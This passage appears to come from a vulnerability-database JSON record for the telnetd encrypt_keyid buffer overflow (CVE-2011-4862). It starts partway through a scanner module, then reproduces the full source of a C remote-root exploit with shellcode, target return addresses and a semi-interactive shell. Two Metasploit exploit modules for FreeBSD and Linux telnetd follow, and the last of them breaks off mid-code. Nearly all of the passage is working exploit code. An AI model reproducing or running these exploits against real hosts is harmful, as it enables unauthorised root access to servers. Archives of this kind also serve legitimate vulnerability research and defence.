print_status(\"#{ip}:#{rport} UNKNOWN: No response to the initial probe: #{banner_sanitized}\")\n return\n end\n\n unless data.index(\"\\xff\\xfa\\x26\\x08\\xff\\xf0\")\n print_status(\"#{ip}:#{rport} UNKNOWN: Invalid reply to Key ID: #{data.unpack(\"H*\")[0]} - #{banner_sanitized}\")\n return\n end\n\n #\n # First round to overwrite the function pointer itself\n #\n sock.put(buff_long)\n data = sock.get_once(-1, 5)\n unless data\n print_status(\"#{ip}:#{rport} NOT VULNERABLE: No reply to first long Key ID: #{banner_sanitized}\")\n return\n end\n\n unless 
data.index(\"\\xff\\xfa\\x26\\x08\\xff\\xf0\")\n print_status(\"#{ip}:#{rport} UNKNOWN: Invalid reply to first Key ID: #{data.unpack(\"H*\")[0]} - #{banner_sanitized}\")\n return\n end\n\n #\n # Second round to force the function to be called\n #\n sock.put(buff_long)\n data = sock.get_once(-1, 5)\n unless data\n print_status(\"#{ip}:#{rport} NOT VULNERABLE: No reply to second long Key ID: #{banner_sanitized}\")\n return\n end\n\n unless data.index(\"\\xff\\xfa\\x26\\x08\\xff\\xf0\")\n print_status(\"#{ip}:#{rport} UNKNOWN: Invalid reply to second Key ID: #{data.unpack(\"H*\")[0]} - #{banner_sanitized}\")\n return\n end\n\n print_status(\"#{ip}:#{rport} NOT VULNERABLE: Service did not disconnect: #{banner_sanitized}\")\n return\n\n rescue ::EOFError\n end\n\n # EOFError or response to 64-byte Key Id indicates vulnerable systems\n print_good(\"#{ip}:#{rport} VULNERABLE: #{banner_sanitized}\")\n report_vuln(\n {\n :host\t => ip,\n :service => svc,\n :name\t => self.name,\n :info\t => \"Module #{self.fullname} confirmed acceptance of a long key ID: #{banner_sanitized}\",\n :refs => self.references\n }\n )\n\n end\n rescue ::Rex::ConnectionError, ::Errno::ECONNRESET => e\n print_error(\"A network issue has occurred: #{e.message}\")\n elog('A network issue has occurred', error: e)\n rescue Timeout::Error => e\n print_error(\"#{target_host}:#{rport} Timed out after #{to} seconds\")\n elog(\"#{target_host}:#{rport} Timed out after #{to} seconds\", error: e)\n rescue ::Exception => e\n print_error(\"#{target_host}:#{rport} Error: #{e} #{e.backtrace}\")\n elog(\"#{target_host}:#{rport} Error: #{e} #{e.backtrace}\", error: e)\n ensure\n disconnect\n end\n end\nend\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/auxiliary/scanner/telnet/telnet_encrypt_overflow.rb"}], "exploitdb": [{"lastseen": "2016-02-02T09:28:42", "description": "Telnetd encrypt_keyid - Remote Root 
Function Pointer Overwrite. CVE-2011-4862. Remote exploit for linux platform", "published": "2011-12-26T00:00:00", "type": "exploitdb", "title": "Telnetd encrypt_keyid - Remote Root Function Pointer Overwrite", "bulletinFamily": "exploit", "cvelist": ["CVE-2011-4862"], "modified": "2011-12-26T00:00:00", "id": "EDB-ID:18280", "href": "https://www.exploit-db.com/exploits/18280/", "sourceData": "/***************************************************************************\r\n * telnetd-encrypt_keyid.c\r\n *\r\n * Mon Dec 26 20:37:05 CET 2011\r\n * \r\n * Copyright 2011 Jaime Penalba Estebanez (NighterMan)\r\n * Copyright 2011 Gonzalo J. Carracedo (BatchDrake)\r\n * \r\n * nighterman@painsec.com - jpenalbae@gmail.com\r\n * BatchDrake@painsec.com - BatchDrake@gmail.com\r\n *\r\n * ______ __ ________\r\n * / __ / /_/ / _____/\r\n * / /_/ /______________\\ \\_____________\r\n * / ___ / __ / / __ / \\ \\/ _ \\/ __/\r\n * / / / /_/ / / / / /___/ / __/ /__\r\n * ____/__/____\\__,_/_/_/ /_/______/\\___/\\____/____\r\n *\r\n *\r\n ****************************************************************************/\r\n\r\n/*\r\n * \r\n * Usage:\r\n * \r\n * $ gcc exploit.c -o exploit\r\n * \r\n * $ ./exploit 127.0.0.1 23 1\r\n * [<] Succes reading intial server request 3 bytes\r\n * [>] Telnet initial encryption mode and IV sent\r\n * [<] Server response: 8 bytes read\r\n * [>] First payload to overwrite function pointer sent\r\n * [<] Server response: 6 bytes read\r\n * [>] Second payload to triger the function pointer\r\n * [*] got shell?\r\n * uid=0(root) gid=0(wheel) groups=0(wheel),5(operator)\r\n * \r\n */\r\n\r\n\r\n#include <stdio.h>\r\n#include <stdlib.h>\r\n#include <string.h>\r\n#include <unistd.h>\r\n#include <errno.h>\r\n#include <sys/time.h>\r\n#include <sys/socket.h>\r\n#include <netinet/in.h>\r\n#include <arpa/inet.h>\r\n\r\n\r\n/*\r\n * Most of the inetd impletantions have a connection limit per second\r\n * so you must chage this if you start getting errors reading 
responses\r\n * - for 60 conex per min 900000\r\n * - for 40 conex per min 1500000\r\n * - for no limit 300000 should work\r\n */\r\n#define BRUTE_TOUT 300000\r\n\r\n\r\n\r\n#define MAXKEYLEN 64-1\r\n\r\nstruct key_info\r\n{\r\n unsigned char keyid[MAXKEYLEN];\r\n unsigned char keylen[4];\r\n unsigned char dir[4];\r\n unsigned char modep[4];\r\n unsigned char getcrypt[4];\r\n};\r\n\r\nstruct target_profile\r\n{\r\n uint32_t skip;\r\n const char *address;\r\n const char *desc;\r\n const char *shellcode;\r\n \r\n};\r\n\r\n\r\n/* Shellcode FreeBSD x86 */\r\nconst char s_bsd32[] =\r\n \"\\x31\\xc0\" // xor %eax,%eax\r\n \"\\x50\" // push %eax\r\n \"\\xb0\\x17\" // mov $0x17,%al\r\n \"\\x50\" // push %eax\r\n \"\\xcd\\x80\" // int $0x80\r\n \"\\x50\" // push %eax\r\n \"\\x68\\x6e\\x2f\\x73\\x68\" // push $0x68732f6e\r\n \"\\x68\\x2f\\x2f\\x62\\x69\" // push $0x69622f2f\r\n \"\\x89\\xe3\" // mov %esp,%ebx\r\n \"\\x50\" // push %eax\r\n \"\\x54\" // push %esp\r\n \"\\x53\" // push %ebx\r\n \"\\x50\" // push %eax\r\n \"\\xb0\\x3b\" // mov $0x3b,%al\r\n \"\\xcd\\x80\"; // int $0x80\r\n\r\n/* Shellcode Linux x86 */\r\nconst char s_linux32[] = \"\\x31\\xc9\\xf7\\xe1\\x51\\x68\\x2f\\x2f\\x73\\x68\\x68\\x2f\\x62\\x69\\x6e\\x89\\xe3\\xb0\\x0b\\xcd\\x80\";\r\n\r\n\r\n/* Shellcode Linux sparc */\r\nconst char s_linuxsparc[] = \"\\x2d\\x0b\\xd8\\x9a\" /* sethi %hi(0x2f626800), %l6 */\r\n \"\\xac\\x15\\xa1\\x6e\" /* or %l6, 0x16e, %l6 */\r\n \"\\x2f\\x0b\\xdc\\xda\" /* sethi %hi(0x2f736800), %l7 */\r\n \"\\x90\\x0b\\x80\\x0e\" /* and %sp, %sp, %o0 */\r\n \"\\x92\\x03\\xa0\\x08\" /* add %sp, 0x08, %o1 */\r\n \"\\x94\\x22\\x80\\x0a\" /* sub %o2, %o2, %o2 */\r\n \"\\x9c\\x03\\xa0\\x10\" /* add %sp, 0x10, %sp */\r\n \"\\xec\\x3b\\xbf\\xf0\" /* std %l6, [ %sp + - 16 ] */\r\n \"\\xd0\\x23\\xbf\\xf8\" /* st %o0, [ %sp + - 8 ] */\r\n \"\\xc0\\x23\\xbf\\xfc\" /* clr [ %sp + -4 ] */\r\n \"\\x82\\x10\\x20\\x3b\" /* mov 0x3b, %g1 */\r\n \"\\x91\\xd0\\x20\\x10\"; /* ta 0x10 */\r\n\r\n\r\n\r\n/* 
Valid targets list */\r\nstruct target_profile targets[] =\r\n{\r\n {20, \"\\x00\\x80\\x05\\x08\", \"Generic Linux i386 bruteforce\", s_linux32},\r\n {20, \"\\x00\\x80\\x05\\x08\", \"Generic BSD i386 bruteforce\", s_bsd32}, \r\n {20, \"\\x23\\xcc\\x05\\x08\", \"Ubuntu GNU/Linux 10.04, Inetutils Server (i386)\", s_linux32},\r\n {20, \"\\x12\\xc9\\x05\\x08\", \"Ubuntu GNU/Linux 10.04, Heimdal Server (i386)\", s_linux32},\r\n {20, \"\\xef\\x56\\x06\\x08\", \"Debian GNU/Linux stable 6.0.3, Inetutils Server (i386)\", s_linux32},\r\n {20, \"\\x56\\x9a\\x05\\x08\", \"Debian GNU/Linux stable 6.0.3, Heimdal Server (i386)\", s_linux32},\r\n {1, \"\\x00\\x03\\xe7\\x94\", \"Debian GNU/Linux stable 6.0.3 Inetutils (SPARC)\", s_linuxsparc},\r\n {3, \"\\x00\\x03\\x2e\\x0c\", \"Debian GNU/Linux stable 6.0.3 Heimdal Server (SPARC)\", s_linuxsparc},\r\n {20, \"\\xa6\\xee\\x05\\x08\", \"FreeBSD 8.0 (i386)\", s_bsd32},\r\n {20, \"\\xa6\\xee\\x05\\x08\", \"FreeBSD 8.1 (i386)\", s_bsd32},\r\n {20, \"\\xed\\xee\\x05\\x08\", \"FreeBSD 8.2 (i386)\", s_bsd32},\r\n {20, \"\\x02\\xac\\x05\\x08\", \"NetBSD 5.1 (i386)\", s_bsd32},\r\n \r\n {0, NULL, NULL, NULL}\r\n};\r\n\r\n\r\n\r\n/* Telnet commands */\r\nstatic unsigned char tnet_init_enc[] = \r\n \"\\xff\\xfa\\x26\\x00\\x01\\x01\\x12\\x13\"\r\n \"\\x14\\x15\\x16\\x17\\x18\\x19\\xff\\xf0\";\r\n\r\nstatic unsigned char tnet_option_enc_keyid[] = \"\\xff\\xfa\\x26\\x07\";\r\n\r\nstatic unsigned char tnet_end_suboption[] = \"\\xff\\xf0\";\r\n\r\n\r\n/* Check if the shellcode worked, slightly simpler than shell (int) */\r\nstatic int\r\ncheckmagic (int fd)\r\n{\r\n char got[32];\r\n \r\n if (write (fd, \"echo pikachu\\n\", 13) < 0)\r\n return -1;\r\n \r\n if (read (fd, got, 32) <= 0)\r\n return -1;\r\n\r\n return -!strstr (got, \"pikachu\");\r\n}\r\n\r\n\r\n/*\r\n * shell(): semi-interactive shell hack\r\n */\r\nstatic void shell(int fd)\r\n{\r\n fd_set fds;\r\n char tmp[128];\r\n int n;\r\n \r\n /* check uid */\r\n write(fd, \"id\\n\", 3);\r\n 
\r\n /* semi-interactive shell */\r\n for (;;) {\r\n FD_ZERO(&fds);\r\n FD_SET(fd, &fds);\r\n FD_SET(0, &fds);\r\n \r\n if (select(FD_SETSIZE, &fds, NULL, NULL, NULL) < 0) {\r\n perror(\"select\");\r\n break;\r\n }\r\n \r\n /* read from fd and write to stdout */\r\n if (FD_ISSET(fd, &fds)) {\r\n if ((n = read(fd, tmp, sizeof(tmp))) < 0) {\r\n fprintf(stderr, \"Goodbye...\\n\");\r\n break;\r\n }\r\n if (write(1, tmp, n) < 0) {\r\n perror(\"write\");\r\n break;\r\n }\r\n }\r\n \r\n /* read from stdin and write to fd */\r\n if (FD_ISSET(0, &fds)) {\r\n if ((n = read(0, tmp, sizeof(tmp))) < 0) {\r\n perror(\"read\");\r\n break;\r\n }\r\n if (write(fd, tmp, n) < 0) {\r\n perror(\"write\");\r\n break;\r\n }\r\n }\r\n }\r\n}\r\n\r\n\r\nstatic int open_connection(in_addr_t dip, int dport)\r\n{\r\n int pconn;\r\n struct sockaddr_in cdata;\r\n struct timeval timeout;\r\n\r\n /* timeout.tv_sec = _opts.timeout; */\r\n timeout.tv_sec = 8;\r\n timeout.tv_usec = 0;\r\n\r\n /* Set socket options and create it */\r\n cdata.sin_addr.s_addr = dip;\r\n cdata.sin_port = htons(dport);\r\n cdata.sin_family = AF_INET;\r\n\r\n pconn = socket(AF_INET, SOCK_STREAM, 0);\r\n \r\n if( pconn < 0 )\r\n {\r\n printf(\"Socket error: %i\\n\", pconn);\r\n printf(\"Err message: %s\\n\", strerror(errno));\r\n return (-1);\r\n }\r\n\r\n /* Set socket timeout */\r\n if ( setsockopt(pconn, SOL_SOCKET, SO_RCVTIMEO,\r\n (void *)&timeout, sizeof(struct timeval)) != 0)\r\n perror(\"setsockopt SO_RCVTIMEO: \");\r\n \r\n /* Set socket options */\r\n if ( setsockopt(pconn, SOL_SOCKET, SO_SNDTIMEO,\r\n (void *)&timeout, sizeof(struct timeval)) != 0)\r\n perror(\"setsockopt SO_SNDTIMEO: \");\r\n \r\n\r\n /* Make connection */\r\n if (connect(pconn,(struct sockaddr *) &cdata, sizeof(cdata)) != 0)\r\n {\r\n close(pconn);\r\n return -1;\r\n }\r\n \r\n return pconn;\r\n}\r\n\r\n\r\n\r\nstatic void usage(char *arg)\r\n{\r\n int x = 0;\r\n \r\n printf(\" ______ __ ________ \\n\");\r\n printf(\" / __ / /_/ / 
_____/\\n\");\r\n printf(\" / /_/ /______________\\\\ \\\\_____________\\n\");\r\n printf(\" / ___ / __ / / __ / \\\\ \\\\/ _ \\\\/ __/\\n\");\r\n printf(\" / / / /_/ / / / / /___/ / __/ /__\\n\");\r\n printf(\" ____/__/____\\\\__,_/_/_/ /_/______/\\\\___/\\\\____/____\\n\");\r\n printf(\" ---------------- www.painsec.com ---------------\\n\\n\");\r\n printf(\"(c) NighterMan & BatchDrake 2011, almost 2012\\n\");\r\n printf(\"OH MY GOD WE ARE ALL ABOUT TO DIE\\n\\n\");\r\n printf(\"Available Targets:\\n\\n\");\r\n \r\n \r\n /* print tagets */\r\n while(targets[x].address != NULL) {\r\n printf(\" %2i: %s\\n\", x + 1, targets[x].desc);\r\n x++;\r\n }\r\n \r\n printf(\"\\n\");\r\n printf(\"Telnetd encrypt_keyid exploit\\n\");\r\n printf(\"Usage: %s [ip] [port] [target]\\n\\n\", arg);\r\n}\r\n\r\n\r\nint\r\nattack (const char *ip, unsigned int port,\r\n unsigned char *payload, unsigned int psize, int tryshell)\r\n{\r\n unsigned char readbuf[256];\r\n int ret;\r\n int conn;\r\n \r\n /* Open the connection */\r\n conn = open_connection(inet_addr(ip), port);\r\n if (conn == -1) {\r\n printf(\"Error connecting: %i\\n\", errno);\r\n return -1;\r\n }\r\n \r\n /* Read initial server request */\r\n ret = read(conn, readbuf, 256);\r\n \r\n if (ret <= 0)\r\n {\r\n printf (\"[!] Error receiving response: %s\\n\", \r\n ret ? 
strerror (errno) : \"empty response\");\r\n close (conn);\r\n return -1;\r\n }\r\n \r\n printf(\"[<] Succes reading intial server request %i bytes\\n\", ret);\r\n \r\n /* printf(\"ATTACH DEBUGGER & PRESS KEY TO CONITNUE\\n\"); */\r\n /* ret = getchar(); */\r\n \r\n /* Send encryption and IV */\r\n ret = write(conn, tnet_init_enc, sizeof(tnet_init_enc));\r\n if (ret != sizeof(tnet_init_enc)) {\r\n printf(\"Error sending init encryption: %i\\n\", ret);\r\n close (conn);\r\n return -1;\r\n }\r\n printf(\"[>] Telnet initial encryption mode and IV sent\\n\");\r\n \r\n /* Read response */\r\n if ((ret = read(conn, readbuf, 256)) == -1 && errno == EAGAIN)\r\n {\r\n printf (\"[!] Timeout when receiving response\\n\");\r\n close (conn);\r\n return -1;\r\n }\r\n else\r\n printf(\"[<] Server response: %i bytes read\\n\", ret);\r\n \r\n /* Send the first payload with the overflow */\r\n ret = write(conn, payload, psize);\r\n if (ret != psize) {\r\n printf(\"Error sending payload first time\\n\");\r\n close (conn);\r\n return -1;\r\n }\r\n printf(\"[>] First payload to overwrite function pointer sent\\n\");\r\n \r\n /* Read Response */\r\n if ((ret = read(conn, readbuf, 256)) == -1 && errno == EAGAIN)\r\n {\r\n printf (\"[!] Timeout when receiving response\\n\");\r\n close (conn);\r\n return -1;\r\n }\r\n else\r\n printf(\"[<] Server response: %i bytes read\\n\", ret);\r\n \r\n \r\n /* Send the payload again to tigger the function overwrite */\r\n ret = write(conn, payload, psize);\r\n if (ret != psize) {\r\n printf(\"Error sending payload second time\\n\");\r\n close (conn);\r\n return -1;\r\n }\r\n printf(\"[>] Second payload to triger the function pointer\\n\");\r\n \r\n if (tryshell)\r\n {\r\n /* Start the semi interactive shell */\r\n printf(\"[*] got shell?\\n\");\r\n shell(conn);\r\n \r\n ret = 0;\r\n }\r\n else\r\n {\r\n printf (\"[*] Does this work? 
\");\r\n \r\n /* Just check if it works */\r\n \r\n if (checkmagic (conn) == 0)\r\n {\r\n printf (\"YES!!!\\n\");\r\n printf (\"Add the Target address to the targets list & recomple!!!\\n\");\r\n ret = 0;\r\n }\r\n else\r\n {\r\n printf (\"nope :(\\n\");\r\n ret = -1;\r\n }\r\n }\r\n \r\n close (conn);\r\n \r\n return ret;\r\n}\r\n\r\n\r\nint main(int argc, char *argv[])\r\n{\r\n int offset = 0;\r\n int target;\r\n int i;\r\n unsigned int address;\r\n \r\n /* Payload Size */\r\n int psize = (sizeof(struct key_info) + \r\n sizeof(tnet_option_enc_keyid) + \r\n sizeof(tnet_end_suboption));\r\n \r\n struct key_info bad_struct;\r\n unsigned char payload[psize];\r\n \r\n if ( argc != 4) {\r\n usage(argv[0]);\r\n return -1;\r\n }\r\n \r\n /* Fill the structure */\r\n memset(&bad_struct, 0x90, sizeof(struct key_info));\r\n memcpy(bad_struct.keylen, \"DEAD\", 4);\r\n memcpy(bad_struct.dir, \"BEEF\", 4);\r\n \r\n target = atoi(argv[3]) - 1;\r\n /* Target selection */\r\n struct target_profile *t;\r\n t = &targets[target];\r\n printf(\"Target: %s\\n\\n\", t->desc);\r\n \r\n for (i = 0; !i || target < 2; i++)\r\n {\r\n offset = 0;\r\n memcpy(&bad_struct.keyid[t->skip], t->shellcode, strlen(t->shellcode));\r\n memcpy (&address, t->address, 4);\r\n \r\n address += ((i + 1) >> 1) * (t->skip - 1) * (1 - ((i & 1) << 1));\r\n printf (\"[*] Target address: 0x%04x\\n\", address);\r\n \r\n memcpy(bad_struct.modep, &address, 4); /* Readable address */\r\n memcpy(bad_struct.getcrypt, &address, 4); /* Function pointer */\r\n \r\n /* Prepare the payload with the overflow */\r\n memcpy(payload, tnet_option_enc_keyid, sizeof(tnet_option_enc_keyid));\r\n offset += sizeof(tnet_option_enc_keyid);\r\n memcpy(&payload[offset], &bad_struct, sizeof(bad_struct));\r\n offset += sizeof(bad_struct);\r\n memcpy(&payload[offset], tnet_end_suboption, sizeof(tnet_end_suboption));\r\n \r\n if (attack (argv[1], atoi (argv[2]), payload, psize, target >= 2) == 0)\r\n break;\r\n \r\n usleep (BRUTE_TOUT);\r\n 
}\r\n \r\n return 0;\r\n}", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://www.exploit-db.com/download/18280/"}, {"lastseen": "2016-02-02T09:36:22", "description": "FreeBSD Telnet Service Encryption Key ID Buffer Overflow. CVE-2011-4862. Remote exploit for bsd platform", "published": "2012-01-14T00:00:00", "type": "exploitdb", "title": "FreeBSD Telnet Service Encryption Key ID Buffer Overflow", "bulletinFamily": "exploit", "cvelist": ["CVE-2011-4862"], "modified": "2012-01-14T00:00:00", "id": "EDB-ID:18369", "href": "https://www.exploit-db.com/exploits/18369/", "sourceData": "##\r\n# $Id: $\r\n##\r\n\r\n##\r\n# This file is part of the Metasploit Framework and may be subject to\r\n# redistribution and commercial restrictions. Please see the Metasploit\r\n# Framework web site for more information on licensing and terms of use.\r\n# http://metasploit.com/framework/\r\n##\r\n\r\n\r\nrequire 'msf/core'\r\n\r\n\r\nclass Metasploit3 < Msf::Exploit::Remote\r\n\tRank = GreatRanking\r\n\r\n\tinclude Msf::Exploit::Remote::Telnet\r\n\tinclude Msf::Exploit::BruteTargets\r\n\r\n\tdef initialize(info = {})\r\n\t\tsuper(update_info(info,\r\n\t\t\t'Name' => 'FreeBSD Telnet Service Encryption Key ID Buffer Overflow',\r\n\t\t\t'Description' => %q{\t\r\n\t\t\t\t\tThis module exploits a buffer overflow in the encryption option handler of the\r\n\t\t\t\tFreeBSD telnet service.\r\n\t\t\t\t},\r\n\t\t\t'Author' => [ 'Jaime Penalba Estebanez <jpenalbae[at]gmail.com>', 'Brandon Perry <bperry.volatile[at]gmail.com>', 'Dan Rosenberg', 'hdm' ],\r\n\t\t\t'License' => MSF_LICENSE,\r\n\t\t\t'References' =>\r\n\t\t\t\t[\r\n\t\t\t\t\t['CVE', '2011-4862'],\r\n\t\t\t\t\t['OSVDB', '78020'],\r\n\t\t\t\t\t['BID', '51182'],\r\n\t\t\t\t\t['URL', 'http://www.exploit-db.com/exploits/18280/']\r\n\t\t\t\t],\r\n\t\t\t'Privileged' => true,\r\n\t\t\t'Platform' => 'bsd',\r\n\t\t\t'Payload' =>\r\n\t\t\t\t{\r\n\t\t\t\t\t'Space' => 
128,\r\n\t\t\t\t\t'BadChars' => \"\\x00\",\r\n\t\t\t\t},\r\n \r\n\t\t\t'Targets' =>\r\n\t\t\t\t[\r\n\t\t\t\t\t[ 'Automatic', { } ],\r\n\t\t\t\t\t[ 'FreeBSD 8.2', { 'Ret' => 0x0804a8a9 } ], # call edx\r\n\t\t\t\t\t[ 'FreeBSD 8.1', { 'Ret' => 0x0804a889 } ], # call edx\r\n\t\t\t\t\t[ 'FreeBSD 8.0', { 'Ret' => 0x0804a869 } ], # call edx\r\n\t\t\t\t\t[ 'FreeBSD 7.3/7.4', { 'Ret' => 0x08057bd0 } ], # call edx\r\n\t\t\t\t\t[ 'FreeBSD 7.0/7.1/7.2', { 'Ret' => 0x0804c4e0 } ], # call edx\r\n\t\t\t\t\t[ 'FreeBSD 6.3/6.4', { 'Ret' => 0x0804a5b4 } ], # call edx\r\n\t\t\t\t\t[ 'FreeBSD 6.0/6.1/6.2', { 'Ret' => 0x08052925 } ], # call edx \r\n\t\t\t\t\t[ 'FreeBSD 5.5', { 'Ret' => 0x0804cf31 } ], # call edx\r\n\t\t\t\t\t# [ 'FreeBSD 5.4', { 'Ret' => 0x08050006 } ] # Version 5.4 does not seem to be exploitable (the crypto() function is not called)\r\n\t\t\t\t\t[ 'FreeBSD 5.3', { 'Ret' => 0x8059730 } ], # direct return\r\n\t\t\t\t\t# Versions 5.2 and below do not support encyption\r\n\t\t\t\t],\r\n\t\t\t'DefaultTarget' => 0,\r\n\t\t\t'DisclosureDate' => 'Dec 23 2011'))\r\n\tend\r\n\r\n\tdef exploit_target(t)\r\n\r\n\t\tconnect\r\n\t\tbanner_sanitized = Rex::Text.to_hex_ascii(banner.to_s)\r\n\t\tvprint_status(banner_sanitized)\r\n\r\n\t\tenc_init = \"\\xff\\xfa\\x26\\x00\\x01\\x01\\x12\\x13\\x14\\x15\\x16\\x17\\x18\\x19\\xff\\xf0\"\r\n\t\tenc_keyid = \"\\xff\\xfa\\x26\\x07\"\r\n\t\tend_suboption = \"\\xff\\xf0\"\r\n\r\n\t\t# Telnet protocol requires 0xff to be escaped with another\r\n\t\tpenc = payload.encoded.gsub(\"\\xff\", \"\\xff\\xff\")\r\n\r\n\t\tkey_id = Rex::Text.rand_text_alphanumeric(400)\r\n\t\tkey_id[ 0, 2] = \"\\xeb\\x76\"\r\n\t\tkey_id[72, 4] = [ t['Ret'] - 20 ].pack(\"V\")\r\n\t\tkey_id[76, 4] = [ t['Ret'] ].pack(\"V\")\r\n\r\n\t\t# Some of these bytes can get mangled, jump over them\r\n\t\tkey_id[80,112] = Rex::Text.rand_text_alphanumeric(112)\r\n\r\n\t\t# Bounce to the real payload (avoid corruption)\r\n\t\tkey_id[120, 2] = \"\\xeb\\x46\"\r\n\r\n\t\t# The actual 
payload\r\n\t\tkey_id[192, penc.length] = penc\r\n\r\n\t\t# Create the Key ID command\r\n\t\tsploit = enc_keyid + key_id + end_suboption\r\n\r\n\t\t# Initiate encryption\r\n\t\tsock.put(enc_init)\r\n\r\n\t\t# Wait for a successful response\r\n\t\tloop do\r\n\t\t\tdata = sock.get_once(-1, 5) rescue nil\r\n\t\t\tif not data\r\n\t\t\t\traise RuntimeError, \"This system does not support encryption\"\r\n\t\t\tend\r\n\t\t\tbreak if data.index(\"\\xff\\xfa\\x26\\x02\\x01\")\r\n\t\tend\r\n\r\n\t\t# The first request smashes the pointer\r\n\t\tprint_status(\"Sending first payload\")\r\n\t\tsock.put(sploit)\r\n\r\n\t\t# Make sure the server replied to the first request\r\n\t\tdata = sock.get_once(-1, 5)\r\n\t\tunless data\r\n\t\t\tprint_status(\"Server did not respond to first payload\")\r\n\t\t\treturn\r\n\t\tend\r\n\r\n\t\t# Some delay between each request seems necessary in some cases\r\n\t\t::IO.select(nil, nil, nil, 0.5)\r\n\r\n\t\t# The second request results in the pointer being called\r\n\t\tprint_status(\"Sending second payload...\")\r\n\t\tsock.put(sploit)\r\n\r\n\t\thandler\r\n\r\n\t\t::IO.select(nil, nil, nil, 0.5)\r\n\t\tdisconnect\r\n\tend\r\n\r\nend\r\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://www.exploit-db.com/download/18369/"}, {"lastseen": "2016-02-02T09:36:14", "description": "Linux BSD-derived Telnet Service Encryption Key ID Buffer Overflow. CVE-2011-4862. Remote exploit for linux platform", "published": "2012-01-14T00:00:00", "type": "exploitdb", "title": "Linux BSD-derived Telnet Service Encryption Key ID Buffer Overflow", "bulletinFamily": "exploit", "cvelist": ["CVE-2011-4862"], "modified": "2012-01-14T00:00:00", "id": "EDB-ID:18368", "href": "https://www.exploit-db.com/exploits/18368/", "sourceData": "##\r\n# $Id: $\r\n##\r\n\r\n##\r\n# This file is part of the Metasploit Framework and may be subject to\r\n# redistribution and commercial restrictions. 
Please see the Metasploit\r\n# Framework web site for more information on licensing and terms of use.\r\n# http://metasploit.com/framework/\r\n##\r\n\r\n\r\nrequire 'msf/core'\r\n\r\n\r\nclass Metasploit3 < Msf::Exploit::Remote\r\n\tRank = GreatRanking\r\n\t\r\n\tinclude Msf::Exploit::Remote::Telnet\r\n\tinclude Msf::Exploit::BruteTargets\r\n\r\n\tdef initialize(info = {})\r\n\t\tsuper(update_info(info,\r\n\t\t\t'Name' => 'Linux BSD-derived Telnet Service Encryption Key ID Buffer Overflow',\r\n\t\t\t'Description' => %q{\t\r\n\t\t\t\t\tThis module exploits a buffer overflow in the encryption option handler of the\r\n\t\t\t\tLinux BSD-derived telnet service (inetutils or krb5-telnet). Most Linux distributions\r\n\t\t\t\tuse NetKit-derived telnet daemons, so this flaw only applies to a small subset of\r\n\t\t\t\tLinux systems running telnetd.\r\n\t\t\t\t},\r\n\t\t\t'Author' => [ 'Jaime Penalba Estebanez <jpenalbae[at]gmail.com>', 'Brandon Perry <bperry.volatile[at]gmail.com>', 'Dan Rosenberg', 'hdm' ],\r\n\t\t\t'License' => MSF_LICENSE,\r\n\t\t\t'References' =>\r\n\t\t\t\t[\r\n\t\t\t\t\t['CVE', '2011-4862'],\r\n\t\t\t\t\t['OSVDB', '78020'],\r\n\t\t\t\t\t['BID', '51182'],\r\n\t\t\t\t\t['URL', 'http://www.exploit-db.com/exploits/18280/']\r\n\t\t\t\t],\r\n\t\t\t'Privileged' => true,\r\n\t\t\t'Platform' => 'linux',\r\n\t\t\t'Payload' =>\r\n\t\t\t\t{\r\n\t\t\t\t\t'Space' => 200,\r\n\t\t\t\t\t'BadChars' => \"\\x00\",\r\n\t\t\t\t\t'DisableNops' => true,\r\n\t\t\t\t},\r\n \r\n\t\t\t'Targets' =>\r\n\t\t\t\t[\r\n\t\t\t\t\t[ 'Automatic', { } ],\r\n\t\t\t\t\t[ 'Red Hat Enterprise Linux 3 (krb5-telnet)', { 'Ret' => 0x0804b43c } ],\r\n\t\t\t\t],\r\n\t\t\t'DefaultTarget' => 0,\r\n\t\t\t'DisclosureDate' => 'Dec 23 2011'))\r\n\tend\r\n\r\n\tdef exploit_target(t)\r\n\r\n\t\tconnect\r\n\t\tbanner_sanitized = Rex::Text.to_hex_ascii(banner.to_s)\r\n\t\tprint_status(banner_sanitized) if datastore['VERBOSE']\r\n\r\n\t\tenc_init = 
\"\\xff\\xfa\\x26\\x00\\x01\\x01\\x12\\x13\\x14\\x15\\x16\\x17\\x18\\x19\\xff\\xf0\"\r\n\t\tenc_keyid = \"\\xff\\xfa\\x26\\x07\"\r\n\t\tend_suboption = \"\\xff\\xf0\"\r\n\r\n\t\tpenc = payload.encoded.gsub(\"\\xff\", \"\\xff\\xff\")\r\n\t\t\r\n\t\tkey_id = Rex::Text.rand_text_alphanumeric(400)\r\n\r\n\t\tkey_id[ 0, 2] = \"\\xeb\\x76\"\r\n\t\tkey_id[72, 4] = [ t['Ret'] - 20 ].pack(\"V\")\r\n\t\tkey_id[76, 4] = [ t['Ret'] ].pack(\"V\")\r\n\r\n\t\t# Some of these bytes can get mangled, jump over them\r\n\t\tkey_id[80,40] = \"\\x41\" * 40\r\n\r\n\t\t# Insert the real payload\r\n\t\tkey_id[120, penc.length] = penc\r\n\r\n\t\t# Create the Key ID command\r\n\t\tsploit = enc_keyid + key_id + end_suboption\r\n\r\n\t\t# Initiate encryption\r\n\t\tsock.put(enc_init)\r\n\r\n\t\t# Wait for a successful response\r\n\t\tloop do\r\n\t\t\tdata = sock.get_once(-1, 5) rescue nil\r\n\t\t\tif not data\r\n\t\t\t\traise RuntimeError, \"This system does not support encryption\"\r\n\t\t\tend\r\n\t\t\tbreak if data.index(\"\\xff\\xfa\\x26\\x02\\x01\")\r\n\t\tend\r\n\r\n\t\t# The first request smashes the pointer\r\n\t\tprint_status(\"Sending first payload\")\r\n\t\tsock.put(sploit) \r\n\t\t\r\n\t\t# Make sure the server replied to the first request\r\n\t\tdata = sock.get_once(-1, 5)\r\n\t\tunless data\r\n\t\t\tprint_status(\"Server did not respond to first payload\")\r\n\t\t\treturn\r\n\t\tend\r\n\r\n\t\t# Some delay between each request seems necessary in some cases\r\n\t\t::IO.select(nil, nil, nil, 0.5)\r\n\r\n\t\t# The second request results in the pointer being called\r\n\t\tprint_status(\"Sending second 